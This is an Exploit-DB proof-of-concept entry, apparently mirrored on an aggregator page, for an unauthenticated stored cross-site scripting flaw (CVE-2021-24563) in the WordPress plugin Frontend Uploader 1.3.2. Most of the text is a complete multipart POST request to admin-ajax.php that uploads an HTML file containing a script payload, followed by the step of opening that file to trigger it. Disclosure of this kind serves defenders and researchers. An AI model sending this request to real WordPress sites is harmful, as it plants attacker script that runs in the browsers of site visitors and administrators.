WordPress Plugin Frontend Uploader 1.3.2 – Stored Cross Site Scripting (XSS) (Unauthenticated)

• Exploit Database
• 113 阅读

• 作者： Veshraj Ghimire
  日期： 2022-01-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50655/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119

  # Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated) # Date: 10/01/2022 # Exploit Author: Veshraj Ghimire # Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/ # Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/ # Version: 1.3.2 # Tested on: Windows 10 - Chrome, WordPress 5.8.2 # CVE :CVE-2021-24563   # References:   https://www.youtube.com/watch?v=lfrLoHl4-Zs https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1   # Description:   The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly     # Proof Of Concept:     POST /wp-admin/admin-ajax.php HTTP/1.1   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8   Accept-Language: en-GB,en;q=0.5   Accept-Encoding: gzip, deflate   Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654   Content-Length: 1396   Connection: close   Upgrade-Insecure-Requests: 1     -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="post_ID"     1247   -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="post_title"     test   -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="post_content"     test   -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="files[]"; filename="xss.html"   Content-Type: text/html     <script>alert(/XSS/)</script>   -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="action"     upload_ugc   -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="form_layout"     image   -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="fu_nonce"     021fb612f9   -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="_wp_http_referer"     /wordpress/frontend-uploader-form/   -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="ff"     92b6cbfa6120e13ff1654e28cef2a271   -----------------------------124662954015823207281179831654   Content-Disposition: form-data; name="form_post_id"     1247   -----------------------------124662954015823207281179831654--       Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html